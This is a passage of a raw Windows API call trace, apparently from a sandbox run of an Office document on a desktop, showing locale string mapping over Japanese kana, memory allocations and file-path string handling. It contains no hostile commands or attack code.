dwMapFlags=0x600000, lpSrcStr="ん", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゔ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゕ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゖ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゗", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゘", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゙", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゚", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゛", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゜", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゝ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゞ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゟ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゠", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ァ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ア", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ィ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="イ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゥ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ウ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ェ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="エ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ォ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="オ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="カ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ガ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="キ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ギ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ク", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="グ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ケ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゲ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="コ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="サ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ザ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="シ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ジ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ス", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ズ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="セ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゼ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ソ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゾ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="タ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ダ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="チ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヂ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ッ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ツ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="テ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="デ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ト", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ド", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ナ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ニ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヌ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ネ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ノ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ハ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="バ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="パ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヒ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ビ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ピ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="フ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ブ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="プ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヘ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ベ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ペ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ホ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ボ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ポ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="マ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ミ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ム", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="メ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="モ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ャ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヤ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ュ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ユ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ョ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヨ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.705] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ラ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="リ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ル", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="レ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ロ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヮ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ワ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヰ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヱ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヲ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ン", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヵ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヶ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヷ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヸ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヹ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヺ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="・", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ー", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヽ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヾ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.706] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヿ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.707] GetUserDefaultLangID () returned 0x409 [0029.707] GetSystemDefaultLangID () returned 0x490409 [0029.707] GetSystemMetrics (nIndex=42) returned 0 [0029.707] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0x74d8b10 [0029.708] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76ce080 [0029.708] IMalloc:Alloc (This=0x7fefe015380, cb=0x20000*=0x78746341) returned 0xb3e5250 [0029.709] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766fe10 [0029.709] GetStockObject (i=13) returned 0x18a002e [0029.709] GetObjectA (in: h=0x18a002e, c=60, pv=0x2e73f0 | out: pv=0x2e73f0) returned 60 [0029.709] IMalloc:Alloc (This=0x7fefe015380, cb=0x7d8) returned 0xb405260 [0029.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0xb40526c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0029.710] IMalloc:Alloc (This=0x7fefe015380, cb=0x98) returned 0x7753040 [0029.710] VirtualQuery (in: lpAddress=0x2e7570, lpBuffer=0x2e7530, dwLength=0x30 | out: lpBuffer=0x2e7530*(BaseAddress=0x2e7000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x9000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0029.710] CreateCompatibleDC (hdc=0x0) returned 0x650106e8 [0029.710] GetCurrentObject (hdc=0x650106e8, type=0x7) returned 0x185000f [0029.710] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766fcc0 [0029.710] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x766fc90 [0029.831] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\098073.doc", lpString2="") returned 1 [0029.831] lstrlenA (lpString="C:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 36 [0029.831] lstrcpyA (in: lpString1=0x91dc750, lpString2="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" [0029.832] SetCursor (hCursor=0x10007) returned 0x10007 [0029.832] GetCurrentThreadId () returned 0x9dc [0029.832] GetCurrentThreadId () returned 0x9dc [0029.832] IMalloc:Alloc (This=0x7fefe015380, cb=0x4) returned 0x777fb20 [0029.833] IMalloc:Alloc (This=0x7fefe015380, cb=0xf0) returned 0x77187d0 [0029.833] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7835a40 [0029.833] IMalloc:Alloc (This=0x7fefe015380, cb=0x280) returned 0x7843580 [0029.834] IMalloc:Alloc (This=0x7fefe015380, cb=0xa08) returned 0x7847550 [0029.834] IMalloc:Alloc (This=0x7fefe015380, cb=0x1738) returned 0x7847f60 [0029.835] GetLocalTime (in: lpSystemTime=0x2e73c8 | out: lpSystemTime=0x2e73c8*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x20, wMilliseconds=0x2e4)) [0029.835] _ultow_s (in: _Value=0x5b6852dc, _Buffer=0x78435aa, _BufferCount=0x103, _Radix=16 | out: _Buffer="5b6852dc") returned 0x0 [0029.835] wcsncpy_s (in: _Destination=0x2e7090, _SizeInWords=0x108, _Source="*\\Z005b6852dc", _MaxCount=0x106 | out: _Destination="*\\Z005b6852dc") returned 0x0 [0029.835] CharLowerBuffW (in: lpsz="*\\Z005b6852dc", cchLength=0xd | out: lpsz="*\\z005b6852dc") returned 0xd [0029.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005b6852dc", cchWideChar=14, lpMultiByteStr=0x2e6fc0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005b6852dc", lpUsedDefaultChar=0x0) returned 14 [0029.835] wcscpy_s (in: _Destination=0x7835a60, _SizeInWords=0xe, _Source="*\\Z005b6852dc" | out: _Destination="*\\Z005b6852dc") returned 0x0 [0029.835] wcsncpy_s (in: _Destination=0x2e70d0, _SizeInWords=0x108, _Source="*\\Z005b6852dc", _MaxCount=0x106 | out: _Destination="*\\Z005b6852dc") returned 0x0 [0029.835] CharLowerBuffW (in: lpsz="*\\Z005b6852dc", cchLength=0xd | out: lpsz="*\\z005b6852dc") returned 0xd [0029.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005b6852dc", cchWideChar=14, lpMultiByteStr=0x2e7000, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005b6852dc", lpUsedDefaultChar=0x0) returned 14 [0029.836] lstrcpyA (in: lpString1=0x91dc780, lpString2="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" [0029.836] lstrcpyA (in: lpString1=0x91dc780, lpString2="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" [0029.836] lstrcpyA (in: lpString1=0x91dc780, lpString2="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" [0029.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x91dc780, cbMultiByte=-1, lpWideCharStr=0x2e7a50, cchWideChar=37 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 37 [0029.836] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0029.836] wcscpy_s (in: _Destination=0x2e77f6, _SizeInWords=0x105, _Source="C:\\Users\\aETAdzjz\\Desktop\\098073.doc" | out: _Destination="C:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0029.836] wcsncpy_s (in: _Destination=0x2e7410, _SizeInWords=0x108, _Source="*\\Z005b6852dc", _MaxCount=0x106 | out: _Destination="*\\Z005b6852dc") returned 0x0 [0029.836] CharLowerBuffW (in: lpsz="*\\Z005b6852dc", cchLength=0xd | out: lpsz="*\\z005b6852dc") returned 0xd [0029.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005b6852dc", cchWideChar=14, lpMultiByteStr=0x2e7340, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005b6852dc", lpUsedDefaultChar=0x0) returned 14 [0029.836] _wcsicmp (_String1="*\\Z005b6852dc", _String2="*\\Z005b6852dc") returned 0 [0029.836] wcsncpy_s (in: _Destination=0x2e7410, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0029.836] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0029.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e7340, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0029.837] wcscpy_s (in: _Destination=0x77f3eb0, _SizeInWords=0x28, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0029.837] wcsncpy_s (in: _Destination=0x2e7410, _SizeInWords=0x108, _Source="*\\Z005b6852dc", _MaxCount=0x106 | out: _Destination="*\\Z005b6852dc") returned 0x0 [0029.837] CharLowerBuffW (in: lpsz="*\\Z005b6852dc", cchLength=0xd | out: lpsz="*\\z005b6852dc") returned 0xd [0029.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005b6852dc", cchWideChar=14, lpMultiByteStr=0x2e7340, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005b6852dc", lpUsedDefaultChar=0x0) returned 14 [0029.837] _wcsicmp (_String1="*\\Z005b6852dc", _String2="*\\Z005b6852dc") returned 0 [0029.837] wcsncpy_s (in: _Destination=0x2e7450, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0029.837] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 